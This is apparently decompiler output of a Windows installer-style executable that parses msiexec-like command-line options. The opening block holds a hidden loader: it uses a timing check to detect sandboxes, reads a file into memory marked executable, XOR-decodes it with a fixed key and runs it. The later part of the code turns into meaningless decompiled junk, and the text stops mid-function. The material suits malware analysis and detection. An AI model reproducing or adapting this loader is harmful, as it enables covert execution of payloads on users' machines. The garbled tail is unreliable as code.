                        			E01061C90(struct HINSTANCE__ __edx, struct HINSTANCE__* _a12) {
                        				struct HINSTANCE__* _v8;
                        				signed int _v12;
                        				WCHAR* _v16;
                        				void* _v20;
                        				struct HINSTANCE__* _v24;
                        				int _v28;
                        				void* _v32;
                        				struct HINSTANCE__* _v36;
                        				struct HINSTANCE__ _v40;
                        				signed int _v44;
                        				struct HINSTANCE__* _v48;
                        				struct HINSTANCE__* _v52;
                        				_Unknown_base(*)()* _v56;
                        				struct HINSTANCE__* _v60;
                        				struct HINSTANCE__* _v64;
                        				signed int _v68;
                        				int _v72;
                        				struct HINSTANCE__ _v76;
                        				struct HINSTANCE__* _v80;
                        				struct HINSTANCE__* _v84;
                        				struct HINSTANCE__* _v88;
                        				struct HINSTANCE__* _v92;
                        				struct HINSTANCE__* _v96;
                        				_Unknown_base(*)()* _v100;
                        				void* _v104;
                        				char _v120;
                        				intOrPtr _v1174338018;
                        				void* __ebx;
                        				signed int __edi;
                        				signed int __esi;
                        				void* __ebp;
                        				_Unknown_base(*)()* _t305;
                        				void* _t306;
                        				void* _t307;
                        				void* _t313;
                        				struct HINSTANCE__* _t314;
                        				signed char _t337;
                        				signed char _t340;
                        				signed char _t341;
                        				signed char _t344;
                        				struct HINSTANCE__* _t356;
                        				struct HINSTANCE__* _t357;
                        				void* _t360;
                        				int _t361;
                        				struct HINSTANCE__* _t362;
                        				signed int _t363;
                        				signed int _t365;
                        				struct HINSTANCE__* _t367;
                        				signed int _t368;
                        				struct HINSTANCE__* _t370;
                        				signed int _t371;
                        				struct HINSTANCE__* _t373;
                        				signed int _t374;
                        				struct HINSTANCE__* _t376;
                        				signed int _t377;
                        				struct HINSTANCE__* _t379;
                        				signed int _t380;
                        				struct HINSTANCE__* _t382;
                        				WCHAR* _t386;
                        				signed int _t387;
                        				struct HINSTANCE__* _t389;
                        				signed int _t390;
                        				signed int _t392;
                        				struct HINSTANCE__* _t394;
                        				signed int _t395;
                        				struct HINSTANCE__* _t397;
                        				struct HINSTANCE__* _t404;
                        				struct HINSTANCE__* _t405;
                        				struct HINSTANCE__* _t406;
                        				struct HINSTANCE__* _t408;
                        				struct HINSTANCE__* _t409;
                        				struct HINSTANCE__* _t410;
                        				struct HINSTANCE__* _t411;
                        				struct HINSTANCE__* _t412;
                        				int _t419;
                        				struct HINSTANCE__* _t422;
                        				struct HINSTANCE__* _t425;
                        				struct HINSTANCE__* _t428;
                        				signed int _t430;
                        				struct HINSTANCE__* _t435;
                        				void* _t437;
                        				struct HINSTANCE__* _t439;
                        				void* _t441;
                        				struct HINSTANCE__* _t443;
                        				signed int _t447;
                        				struct HINSTANCE__* _t449;
                        				signed int _t451;
                        				void* _t458;
                        				long _t460;
                        				void* _t468;
                        				void* _t470;
                        				intOrPtr* _t472;
                        				struct HINSTANCE__* _t473;
                        				WCHAR* _t482;
                        				intOrPtr* _t490;
                        				struct HINSTANCE__* _t491;
                        				void* _t492;
                        				signed char _t493;
                        				signed char _t496;
                        				struct HINSTANCE__* _t504;
                        				signed short _t505;
                        				struct HINSTANCE__ _t514;
                        				void* _t515;
                        				struct HINSTANCE__* _t518;
                        				void* _t520;
                        				_Unknown_base(*)()* _t521;
                        				struct HINSTANCE__* _t522;
                        				void* _t523;
                        				signed int _t534;
                        				void* _t535;
                        				signed int _t536;
                        				signed int _t537;
                        				long _t540;
                        				void* _t541;
                        				int _t544;
                        				signed int _t562;
                        				void* _t565;
                        				signed int _t566;
                        				void* _t567;
                        				void* _t580;
                        				int _t581;
                        				int _t583;
                        
                        				_t514 = __edx;
                        				_t581 = _t580 - 0x74;
                        				_v24 = 0;
                        				_v60 = 0;
                        				_v64 = 0;
                        				_v36 = 0;
                        				_v48 = 0;
                        				_v80 = 0;
                        				_v84 = 0;
                        				_v88 = 0;
                        				_v92 = 0;
                        				_v96 = 0;
                        				_v52 = 0;
                        				_v16 = 0;
                        				_v20 = 0;
                        				_v28 = 0;
                        				_v104 = 0;
                        				_v68 = 0;
                        				_v12 = 0;
                        				_v32 = 0;
                        				_v76 = 0;
                        				_v72 = 0;
                        				_v44 = 5;
                        				_v40 = 0;
                        				_v8 = 0;
                        				_v56 = GetProcAddress(LoadLibraryW(L"Kernel32.dll"), "GetTickCount");
                        				_t521 = GetProcAddress(LoadLibraryW(L"Kernel32.dll"), "Sleep");
                        				_t305 = GetProcAddress(LoadLibraryW(L"Kernel32.dll"), "VirtualAlloc");
                        				_t472 = _v56;
                        				_v100 = _t305;
                        				_t306 =  *_t472(_t520, _t541, _t470, _t567);
                        				Sleep(0x2be); // executed
                        				_t307 =  *_t472();
                        				_t595 = _t307 - _t306 - 0x2bc;
                        				if(_t307 - _t306 >= 0x2bc) {
                        					_t458 = E01063B3A(_a12, L"rb"); // executed
                        					_push(2);
                        					_t565 = _t458;
                        					_push(0);
                        					_push(_t565); // executed
                        					E010633B4(_t472, _t514, _t521, _t565, _t595); // executed
                        					_push(_t565); // executed
                        					_t460 = E0106378C(_t472, _t514, _t521, _t565, _t595); // executed
                        					_push(0);
                        					_push(0);
                        					_push(_t565);
                        					_t540 = _t460; // executed
                        					E010633B4(_t472, _t514, _t540, _t565, _t595); // executed
                        					_t490 = VirtualAlloc(0, _t540, 0x3000, 0x40);
                        					E01063279(_t490, _t540, 1, _t565); // executed
                        					_t581 = _t581 + 0x34;
                        					_t566 = 0;
                        					if(_t540 != 0) {
                        						do {
                        							_t514 = 0xaaaaaaab * _t566 >> 0x20 >> 3;
                        							_t468 = _t566 - (_t514 + _t514 * 2 << 2);
                        							_t566 = _t566 + 1;
                        							_t35 = _t468 + "248058040134"; // 0x30383432
                        							 *(_t490 + _t566 - 1) =  *(_t490 + _t566 - 1) ^  *_t35;
                        							_t597 = _t566 - _t540;
                        						} while (_t566 < _t540);
                        					}
                        					 *_t490(); // executed
                        				}
                        				__imp__#17();
                        				E01061A90(_t597, GetCommandLineW(),  &_a12,  &_v8);
                        				_t522 = _a12;
                        				_t473 = _v8;
                        				if(_t522 <= 1) {
                        					L11:
                        					__eflags = _t522 - 3;
                        					if(_t522 != 3) {
                        						L16:
                        						_t544 = 1;
                        						_v56 = 1;
                        						__eflags = _t522 - 1;
                        						if(_t522 > 1) {
                        							do {
                        								_t499 = _t473[_t544];
                        								_t365 =  *(_t473[_t544]) & 0x0000ffff;
                        								__eflags = _t365 - 0x2f;
                        								if(_t365 == 0x2f) {
                        									L19:
                        									_t367 = E01061960(_t499 + 2, "regserver");
                        									__eflags = _t367;
                        									if(_t367 == 0) {
                        										goto L21;
                        									} else {
                        										_v88 = 1;
                        									}
                        								} else {
                        									__eflags = _t365 - 0x2d;
                        									if(_t365 != 0x2d) {
                        										L21:
                        										_t500 = _t473[_t544];
                        										_t368 =  *(_t473[_t544]) & 0x0000ffff;
                        										__eflags = _t368 - 0x2f;
                        										if(_t368 == 0x2f) {
                        											L23:
                        											_t370 = E01061960(_t500 + 2, "unregserver");
                        											__eflags = _t370;
                        											if(_t370 != 0) {
                        												goto L152;
                        											} else {
                        												goto L24;
                        											}
                        										} else {
                        											__eflags = _t368 - 0x2d;
                        											if(_t368 != 0x2d) {
                        												L24:
                        												_t501 = _t473[_t544];
                        												_t371 =  *(_t473[_t544]) & 0x0000ffff;
                        												__eflags = _t371 - 0x2f;
                        												if(_t371 == 0x2f) {
                        													L26:
                        													_t373 = E01061960(_t501 + 2, "unregister");
                        													__eflags = _t373;
                        													if(_t373 != 0) {
                        														goto L152;
                        													} else {
                        														goto L27;
                        													}
                        												} else {
                        													__eflags = _t371 - 0x2d;
                        													if(_t371 != 0x2d) {
                        														L27:
                        														_t502 = _t473[_t544];
                        														_t374 =  *(_t473[_t544]) & 0x0000ffff;
                        														__eflags = _t374 - 0x2f;
                        														if(_t374 == 0x2f) {
                        															L29:
                        															_t376 = E01061960(_t502 + 2, "unreg");
                        															__eflags = _t376;
                        															if(_t376 != 0) {
                        																L152:
                        																_v92 = 1;
                        															} else {
                        																goto L30;
                        															}
                        														} else {
                        															__eflags = _t374 - 0x2d;
                        															if(_t374 != 0x2d) {
                        																L30:
                        																_t491 = _t473[_t544];
                        																_t377 = _t491->i & 0x0000ffff;
                        																__eflags = _t377 - 0x2f;
                        																if(_t377 == 0x2f) {
                        																	L32:
                        																	_t379 = E010619F0( &(_t491->i), "i");
                        																	__eflags = _t379;
                        																	if(_t379 != 0) {
                        																		goto L144;
                        																	} else {
                        																		goto L33;
                        																	}
                        																} else {
                        																	__eflags = _t377 - 0x2d;
                        																	if(_t377 != 0x2d) {
                        																		L33:
                        																		_t491 = _t473[_t544];
                        																		_t387 = _t491->i & 0x0000ffff;
                        																		__eflags = _t387 - 0x2f;
                        																		if(_t387 == 0x2f) {
                        																			L35:
                        																			_t389 = E010619F0( &(_t491->i), "package");
                        																			__eflags = _t389;
                        																			if(_t389 != 0) {
                        																				L144:
                        																				_t473 = _t473[_t544];
                        																				_t380 = _t473->i & 0x0000ffff;
                        																				__eflags = _t380 - 0x2f;
                        																				if(_t380 == 0x2f) {
                        																					L147:
                        																					_t382 = E010619F0( &(_t473->i), "i");
                        																				} else {
                        																					__eflags = _t380 - 0x2d;
                        																					if(_t380 == 0x2d) {
                        																						goto L147;
                        																					} else {
                        																						_t382 = 0;
                        																					}
                        																				}
                        																				__eflags = _t382;
                        																				_t534 = (_t382 != 0) ? 2 : 8;
                        																				_v24 = 1;
                        																				_t314 = lstrlenW(_v8[_t544]);
                        																				__eflags = _t314 - 8;
                        																				if(_t314 <= 8) {
                        																					_t522 = _a12;
                        																					_t544 = _t544 + 1;
                        																					__eflags = _t544 - _t522;
                        																					if(_t544 >= _t522) {
                        																						goto L185;
                        																					}
                        																					_t473 = _v8;
                        																					_v16 = _t473[_t544];
                        																				} else {
                        																					_t386 = _t473 + _t534 * 2;
                        																					_t522 = _a12;
                        																					_t473 = _v8;
                        																					_v16 = _t386;
                        																				}
                        																			} else {
                        																				goto L36;
                        																			}
                        																		} else {
                        																			__eflags = _t387 - 0x2d;
                        																			if(_t387 != 0x2d) {
                        																				L36:
                        																				_t491 = _t473[_t544];
                        																				_t390 = _t491->i & 0x0000ffff;
                        																				__eflags = _t390 - 0x2f;
                        																				if(_t390 == 0x2f) {
                        																					L38:
                        																					_t314 = E01061960( &(_t491->i), "a");
                        																					__eflags = _t314;
                        																					if(_t314 == 0) {
                        																						goto L41;
                        																					} else {
                        																						_t544 = _t544 + 1;
                        																						_v24 = 1;
                        																						_v60 = 1;
                        																						_v72 = 1;
                        																						__eflags = _t544 - _t522;
                        																						if(_t544 >= _t522) {
                        																							goto L185;
                        																						}
                        																						_v16 = _t473[_t544];
                        																						E01061430( &_v20, L"ACTION=ADMIN");
                        																						_t473 = _v8;
                        																					}
                        																				} else {
                        																					__eflags = _t390 - 0x2d;
                        																					if(_t390 != 0x2d) {
                        																						L41:
                        																						_t491 = _t473[_t544];
                        																						_t392 = _t491->i & 0x0000ffff;
                        																						__eflags = _t392 - 0x2f;
                        																						if(_t392 == 0x2f) {
                        																							L43:
                        																							_t394 = E010619F0( &(_t491->i), "f");
                        																							__eflags = _t394;
                        																							if(_t394 == 0) {
                        																								goto L51;
                        																							} else {
                        																								_t314 = lstrlenW(_t473[_t544]);
                        																								_t473 = _t314;
                        																								_t537 = 2;
                        																								_v64 = 1;
                        																								__eflags = _t473 - 2;
                        																								if(_t473 > 2) {
                        																									do {
                        																										_t491 =  *(_v8[_t544] + _t537 * 2) & 0x0000ffff;
                        																										_t441 = _t491 - 0x41;
                        																										__eflags = _t441 - 0x35;
                        																										if(_t441 > 0x35) {
                        																											L48:
                        																											_push(_t491);
                        																											_push("Unknown option \"%c\" in Repair mode\n");
                        																											_t443 = E01062E24() + 0x40;
                        																											__eflags = _t443;
                        																											_push(_t443);
                        																											_t314 = E01062F67(_t473, _t537, _t544, _t443);
                        																											_t581 = _t581 + 0xc;
                        																										} else {
                        																											switch( *((intOrPtr*)(( *(_t441 + 0x1062780) & 0x000000ff) * 4 +  &M01062778))) {
                        																												case 0:
                        																													goto L49;
                        																												case 1:
                        																													goto L48;
                        																											}
                        																										}
                        																										L49:
                        																										_t537 = _t537 + 1;
                        																										__eflags = _t537 - _t473;
                        																									} while (_t537 < _t473);
                        																								}
                        																								goto L64;
                        																							}
                        																						} else {
                        																							__eflags = _t392 - 0x2d;
                        																							if(_t392 != 0x2d) {
                        																								L51:
                        																								_t491 = _t473[_t544];
                        																								_t395 = _t491->i & 0x0000ffff;
                        																								__eflags = _t395 - 0x2f;
                        																								if(_t395 == 0x2f) {
                        																									L53:
                        																									_t397 = E010619F0( &(_t491->i), "x");
                        																									__eflags = _t397;
                        																									if(_t397 != 0) {
                        																										goto L134;
                        																									} else {
                        																										goto L54;
                        																									}
                        																								} else {
                        																									__eflags = _t395 - 0x2d;
                        																									if(_t395 != 0x2d) {
                        																										L54:
                        																										_push("uninstall");
                        																										_t404 = L01061900(_t473[_t544]);
                        																										__eflags = _t404;
                        																										if(_t404 != 0) {
                        																											L134:
                        																											_t491 = _t473[_t544];
                        																											_v24 = 1;
                        																											_t314 = _t491->i & 0x0000ffff;
                        																											__eflags = _t314 - 0x2f;
                        																											if(_t314 == 0x2f) {
                        																												L136:
                        																												_t314 = E010619F0( &(_t491->i), "x");
                        																												__eflags = _t314;
                        																												if(_t314 == 0) {
                        																													goto L138;
                        																												} else {
                        																													_t473 = _t473[_t544] + 4;
                        																													_v16 = _t473;
                        																												}
                        																											} else {
                        																												__eflags = _t314 - 0x2d;
                        																												if(_t314 != 0x2d) {
                        																													L138:
                        																													_t473 = _v16;
                        																												} else {
                        																													goto L136;
                        																												}
                        																											}
                        																											__eflags = _t473;
                        																											if(_t473 == 0) {
                        																												L141:
                        																												_t544 = _t544 + 1;
                        																												__eflags = _t544 - _t522;
                        																												if(_t544 >= _t522) {
                        																													goto L185;
                        																												}
                        																												_t473 = _v8;
                        																												_v16 = _t473[_t544];
                        																												E01061430( &_v20, L"REMOVE=ALL");
                        																											} else {
                        																												__eflags = _t473->i;
                        																												if(_t473->i != 0) {
                        																													_t473 = _v8;
                        																													E01061430( &_v20, L"REMOVE=ALL");
                        																												} else {
                        																													goto L141;
                        																												}
                        																											}
                        																										} else {
                        																											_push("j");
                        																											_t405 = E01061930(_t473[_t544]);
                        																											__eflags = _t405;
                        																											if(_t405 == 0) {
                        																												_t314 = E01061960(_t473[_t544], "u");
                        																												__eflags = _t314;
                        																												if(_t314 == 0) {
                        																													_t314 = E01061960(_t473[_t544], "m");
                        																													__eflags = _t314;
                        																													if(_t314 == 0) {
                        																														_push("t");
                        																														_t314 = L01061900(_t473[_t544]);
                        																														__eflags = _t314;
                        																														if(_t314 == 0) {
                        																															_push("g");
                        																															_t314 = L01061900(_t473[_t544]);
                        																															__eflags = _t314;
                        																															if(_t314 == 0) {
                        																																_push("l");
                        																																_t406 = E01061930(_t473[_t544]);
                        																																__eflags = _t406;
                        																																if(_t406 == 0) {
                        																																	_push("p");
                        																																	_t314 = L01061900(_t473[_t544]);
                        																																	__eflags = _t314;
                        																																	if(_t314 != 0) {
                        																																		L132:
                        																																		_t544 = _t544 + 1;
                        																																		_v48 = 1;
                        																																		__eflags = _t544 - _t522;
                        																																		if(_t544 >= _t522) {
                        																																			goto L185;
                        																																		}
                        																																		_v76 = _t473[_t544];
                        																																	} else {
                        																																		_push("update");
                        																																		_t314 = L01061900(_t473[_t544]);
                        																																		__eflags = _t314;
                        																																		if(_t314 != 0) {
                        																																			goto L132;
                        																																		} else {
                        																																			_push("q");
                        																																			_t408 = E01061930(_t473[_t544]);
                        																																			__eflags = _t408;
                        																																			if(_t408 == 0) {
                        																																				_push("passive");
                        																																				_t409 = L01061900(_t473[_t544]);
                        																																				__eflags = _t409;
                        																																				if(_t409 == 0) {
                        																																					_push("y");
                        																																					_t314 = L01061900(_t473[_t544]);
                        																																					__eflags = _t314;
                        																																					if(_t314 == 0) {
                        																																						_push("z");
                        																																						_t314 = L01061900(_t473[_t544]);
                        																																						__eflags = _t314;
                        																																						if(_t314 == 0) {
                        																																							_push("help");
                        																																							_t314 = L01061900(_t473[_t544]);
                        																																							__eflags = _t314;
                        																																							if(_t314 != 0) {
                        																																								L184:
                        																																								E01061320(0);
                        																																								goto L185;
                        																																							}
                        																																							_push("?");
                        																																							_t314 = L01061900(_t473[_t544]);
                        																																							__eflags = _t314;
                        																																							if(_t314 != 0) {
                        																																								goto L184;
                        																																							}
                        																																							_push("m");
                        																																							_t410 = L01061900(_t473[_t544]);
                        																																							__eflags = _t410;
                        																																							if(_t410 == 0) {
                        																																								_push("D");
                        																																								_t411 = L01061900(_t473[_t544]);
                        																																								__eflags = _t411;
                        																																								if(_t411 == 0) {
                        																																									_push("V");
                        																																									_t412 = L01061900(_t473[_t544]);
                        																																									__eflags = _t412;
                        																																									if(_t412 == 0) {
                        																																										E01061430( &_v20, _t473[_t544]);
                        																																									} else {
                        																																										_v96 = 1;
                        																																									}
                        																																								} else {
                        																																									_v52 = 1;
                        																																								}
                        																																							} else {
                        																																								_v52 = 1;
                        																																							}
                        																																						} else {
                        																																							_t544 = _t544 + 1;
                        																																							_v84 = 1;
                        																																							__eflags = _t544 - _t522;
                        																																							if(_t544 >= _t522) {
                        																																								goto L185;
                        																																							}
                        																																							_v40 = _t473[_t544];
                        																																						}
                        																																					} else {
                        																																						_t544 = _t544 + 1;
                        																																						_v80 = 1;
                        																																						__eflags = _t544 - _t522;
                        																																						if(_t544 >= _t522) {
                        																																							goto L185;
                        																																						}
                        																																						_v40 = _t473[_t544];
                        																																					}
                        																																				} else {
                        																																					E01061430( &_v20, L"REBOOTPROMPT=\"S\"");
                        																																				}
                        																																			} else {
                        																																				_t419 = lstrlenW(_t473[_t544]);
                        																																				__eflags = _t419 - 2;
                        																																				if(_t419 == 2) {
                        																																					L114:
                        																																					_v44 = 2;
                        																																				} else {
                        																																					_t422 = E01061960(_t473[_t544] + 4, "n");
                        																																					__eflags = _t422;
                        																																					if(_t422 != 0) {
                        																																						goto L114;
                        																																					} else {
                        																																						_t425 = E01061960(_t473[_t544] + 4, "uiet");
                        																																						__eflags = _t425;
                        																																						if(_t425 != 0) {
                        																																							goto L114;
                        																																						} else {
                        																																							_t428 = E01061960(_t473[_t544] + 4, "r");
                        																																							__eflags = _t428;
                        																																							if(_t428 != 0) {
                        																																								_v44 = 4;
                        																																							}
                        																																						}
                        																																					}
                        																																				}
                        																																			}
                        																																		}
                        																																	}
                        																																} else {
                        																																	_t314 = lstrlenW(_t473[_t544]);
                        																																	__eflags = _t314 - 2;
                        																																	if(_t314 > 2) {
                        																																		_t562 = _v12;
                        																																		_t535 = _v32;
                        																																		_t504 = _t473[_t544] + 4;
                        																																		__eflags = _t504;
                        																																		_t160 = _t314 - 2; // -2
                        																																		_t518 = _t160;
                        																																		do {
                        																																			_t314 = ( *_t504 & 0x0000ffff) + 0xffffffdf;
                        																																			__eflags = _t314 - 0x56;
                        																																			if(_t314 <= 0x56) {
                        																																				_t161 = _t314 + 0x106282c; // 0xffffd8af
                        																																				_t314 =  *_t161 & 0x000000ff;
                        																																				switch( *((intOrPtr*)(_t314 * 4 +  &M010627F0))) {
                        																																					case 0:
                        																																						__edi = __edi | 0x00000002;
                        																																						__eflags = __edi;
                        																																						goto L101;
                        																																					case 1:
                        																																						__esi = 0x7fdf;
                        																																						goto L101;
                        																																					case 2:
                        																																						__edi = __edi | 0x00000001;
                        																																						goto L101;
                        																																					case 3:
                        																																						__esi = __esi | 0x00000100;
                        																																						goto L101;
                        																																					case 4:
                        																																						__esi = __esi | 0x00000800;
                        																																						goto L101;
                        																																					case 5:
                        																																						__esi = __esi | 0x00000002;
                        																																						goto L101;
                        																																					case 6:
                        																																						_t562 = _t562 | 0x00000010;
                        																																						goto L101;
                        																																					case 7:
                        																																						__esi = __esi | 0x00000001;
                        																																						goto L101;
                        																																					case 8:
                        																																						__esi = __esi | 0x00000080;
                        																																						goto L101;
                        																																					case 9:
                        																																						__esi = __esi | 0x00000400;
                        																																						goto L101;
                        																																					case 0xa:
                        																																						__esi = __esi | 0x00000200;
                        																																						goto L101;
                        																																					case 0xb:
                        																																						__esi = __esi | 0x00000008;
                        																																						goto L101;
                        																																					case 0xc:
                        																																						__esi = __esi | 0x00001000;
                        																																						goto L101;
                        																																					case 0xd:
                        																																						__esi = __esi | 0x00000004;
                        																																						goto L101;
                        																																					case 0xe:
                        																																						goto L101;
                        																																				}
                        																																			}
                        																																			L101:
                        																																			_t504 =  &(_t504->i);
                        																																			_t518 = _t518 - 1;
                        																																			__eflags = _t518;
                        																																		} while (_t518 != 0);
                        																																		_v32 = _t535;
                        																																		_t522 = _a12;
                        																																		_v12 = _t562;
                        																																		_t544 = _v56;
                        																																	}
                        																																	_t544 = _t544 + 1;
                        																																	__eflags = _t544 - _t522;
                        																																	if(_t544 >= _t522) {
                        																																		goto L185;
                        																																	}
                        																																	0x1060000(_v12, _t473[_t544], _v32);
                        																																	__eflags = _t314;
                        																																	if(_t314 != 0) {
                        																																		ExitProcess(1);
                        																																	}
                        																																}
                        																															} else {
                        																																_t544 = _t544 + 1;
                        																																__eflags = _t544 - _t522;
                        																																if(_t544 >= _t522) {
                        																																	goto L185;
                        																																}
                        																																_t514 = _t473[_t544];
                        																																_t505 = 0;
                        																																_t430 =  *_t514 & 0x0000ffff;
                        																																__eflags = _t430 - 0x30;
                        																																if(_t430 >= 0x30) {
                        																																	while(1) {
                        																																		__eflags = _t430 - 0x39;
                        																																		if(_t430 > 0x39) {
                        																																			goto L81;
                        																																		}
                        																																		_t514 = _t514 + 2;
                        																																		_t505 = (_t430 & 0x0000ffff) + (_t505 + _t505 * 4 - 0x18) * 2;
                        																																		_t430 =  *_t514 & 0x0000ffff;
                        																																		__eflags = _t430 - 0x30;
                        																																		if(_t430 >= 0x30) {
                        																																			continue;
                        																																		}
                        																																		goto L81;
                        																																	}
                        																																}
                        																																L81:
                        																																_v68 = _t505 & 0x0000ffff;
                        																															}
                        																														} else {
                        																															_t544 = _t544 + 1;
                        																															__eflags = _t544 - _t522;
                        																															if(_t544 >= _t522) {
                        																																goto L185;
                        																															}
                        																															E01061430( &_v104, _t473[_t544]);
                        																														}
                        																													} else {
                        																														_v28 = 0;
                        																														goto L70;
                        																													}
                        																												} else {
                        																													_v28 = 1;
                        																													L70:
                        																													_t544 = _t544 + 1;
                        																													_v36 = 1;
                        																													__eflags = _t544 - _t522;
                        																													if(_t544 >= _t522) {
                        																														goto L185;
                        																													}
                        																													_v16 = _t473[_t544];
                        																													_t473 = _v8;
                        																												}
                        																											} else {
                        																												_t314 = lstrlenW(_t473[_t544]);
                        																												_t473 = _t314;
                        																												_t536 = 2;
                        																												_v36 = 1;
                        																												__eflags = _t473 - 2;
                        																												if(_t473 > 2) {
                        																													do {
                        																														_t491 = _v8[_t544][_t536] & 0x0000ffff;
                        																														_t437 = _t491 - 0x4d;
                        																														__eflags = _t437 - 0x28;
                        																														if(_t437 > 0x28) {
                        																															L62:
                        																															_push(_t491);
                        																															_push("Unknown option \"%c\" in Advertise mode\n");
                        																															_t439 = E01062E24() + 0x40;
                        																															__eflags = _t439;
                        																															_push(_t439);
                        																															_t314 = E01062F67(_t473, _t536, _t544, _t439);
                        																															_t581 = _t581 + 0xc;
                        																														} else {
                        																															_t314 =  *(_t437 + 0x10627c4) & 0x000000ff;
                        																															switch( *((intOrPtr*)(_t314 * 4 +  &M010627B8))) {
                        																																case 0:
                        																																	_v28 = 0;
                        																																	goto L63;
                        																																case 1:
                        																																	_v28 = 1;
                        																																	goto L63;
                        																																case 2:
                        																																	goto L62;
                        																															}
                        																														}
                        																														L63:
                        																														_t536 = _t536 + 1;
                        																														__eflags = _t536 - _t473;
                        																													} while (_t536 < _t473);
                        																												}
                        																												L64:
                        																												_t522 = _a12;
                        																												_t544 = _t544 + 1;
                        																												__eflags = _t544 - _t522;
                        																												if(_t544 >= _t522) {
                        																													L185:
                        																													E01061320(1);
                        																													_t583 = _t314->i;
                        																													_t314->i = _t581;
                        																													 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)(_t314 + 0x20)) + _t544;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t491->i = _t314 + _t491->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													_t314->i = _t314 + _t314->i;
                        																													 *((intOrPtr*)(_t473 + 0x62129ff)) =  *((intOrPtr*)(_t473 + 0x62129ff)) + _t491;
                        																													_t314->i = _t314->i + _t583;
                        																													 *_t544 =  *_t544 & _t314;
                        																													 *_t514 =  *_t514 + _t544;
                        																													 *_t544 =  *_t544 & _t314;
                        																													_t314->i = _t314 + _t314->i;
                        																													asm("fisub word [edx]");
                        																													_t515 = _t514 + _t514;
                        																													_t492 = _t491 + _t473;
                        																													_t337 = _t314 +  *_t514 +  *_t514 +  *_t514 + _t491->i +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *((intOrPtr*)(_t314 +  *_t514 +  *_t514 +  *_t514 + _t491->i +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514)) +  *_t514 +  *_t514 +  *_t514 + _t491->i &  *_t544 &  *_t544;
                        																													 *((intOrPtr*)(_t337 - 0x52fef9de)) =  *((intOrPtr*)(_t337 - 0x52fef9de)) + _t473;
                        																													 *((intOrPtr*)(_t473 - 0x76fef9de)) =  *((intOrPtr*)(_t473 - 0x76fef9de)) + _t515;
                        																													_v1174338018 = _v1174338018 + _t544;
                        																													_t340 = _t337 &  *_t544 &  *_t544 &  *_t544;
                        																													_t341 = _t340 &  *_t544;
                        																													 *((intOrPtr*)(_t341 - 0x57fef9de)) =  *((intOrPtr*)(_t341 - 0x57fef9de)) + _t583;
                        																													 *((intOrPtr*)(_t544 - 0x1efef9de)) =  *((intOrPtr*)(_t544 - 0x1efef9de)) + _t492;
                        																													_t344 = _t341 &  *_t544 &  *_t544 &  *_t544;
                        																													 *_t344 =  *_t344 + _t344;
                        																													 *((intOrPtr*)(_t515 + _t340 + _t492)) =  *((intOrPtr*)(_t515 + _t340 + _t492)) + _t344;
                        																													_t493 = _t492 +  *_t544;
                        																													es = cs;
                        																													 *_t493 =  *_t493 | _t493;
                        																													_t496 = (_t493 |  *_t544 |  *((_t493 |  *_t544) + 0xe0e0e0e)) +  *_t544;
                        																													es = cs;
                        																													 *_t496 =  *_t496 | _t496;
                        																													__eflags = _t496 |  *_t544 |  *((_t496 |  *_t544) + 0x2425ffcc);
                        																													asm("int3");
                        																													return __imp__#17(cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, es, es, es);
                        																												}
                        																												_t435 = _v8;
                        																												_v16 = _t435[_t544];
                        																												_t473 = _t435;
                        																											}
                        																										}
                        																									} else {
                        																										goto L53;
                        																									}
                        																								}
                        																							} else {
                        																								goto L43;
                        																							}
                        																						}
                        																					} else {
                        																						goto L38;
                        																					}
                        																				}
                        																			} else {
                        																				goto L35;
                        																			}
                        																		}
                        																	} else {
                        																		goto L32;
                        																	}
                        																}
                        															} else {
                        																goto L29;
                        															}
                        														}
                        													} else {
                        														goto L26;
                        													}
                        												}
                        											} else {
                        												goto L23;
                        											}
                        										}
                        									} else {
                        										goto L19;
                        									}
                        								}
                        								_t544 = _t544 + 1;
                        								_v56 = _t544;
                        								__eflags = _t544 - _t522;
                        							} while (_t544 < _t522);
                        						}
                        						0x1060000(_v44, 0);
                        						_t473 = _v20;
                        						_t313 = E01061490(_t473);
                        						__eflags = _v60;
                        						_t491 = _v48;
                        						_t523 = _t313;
                        						_t314 = _v24;
                        						if(_v60 != 0) {
                        							_t514 = 0;
                        							__eflags = _t491;
                        							_t314 =  !=  ? 0 : _t314;
                        						}
                        						_t544 = 1;
                        						__eflags = _t314;
                        						if(_t314 == 0) {
                        							__eflags = _v64;
                        							if(_v64 != 0) {
                        								goto L160;
                        							} else {
                        								__eflags = _v36;
                        								if(_v36 == 0) {
                        									__eflags = _t491;
                        									if(_t491 == 0) {
                        										__eflags = _v80;
                        										if(_v80 == 0) {
                        											__eflags = _v84;
                        											if(_v84 == 0) {
                        												__eflags = _v88;
                        												if(_v88 == 0) {
                        													__eflags = _v92;
                        													if(_v92 == 0) {
                        														__eflags = _v96;
                        														if(_v96 == 0) {
                        															__eflags = _v52;
                        															if(_v52 == 0) {
                        																goto L185;
                        															}
                        															goto L160;
                        														} else {
                        															0x1060000();
                        															return _t314;
                        														}
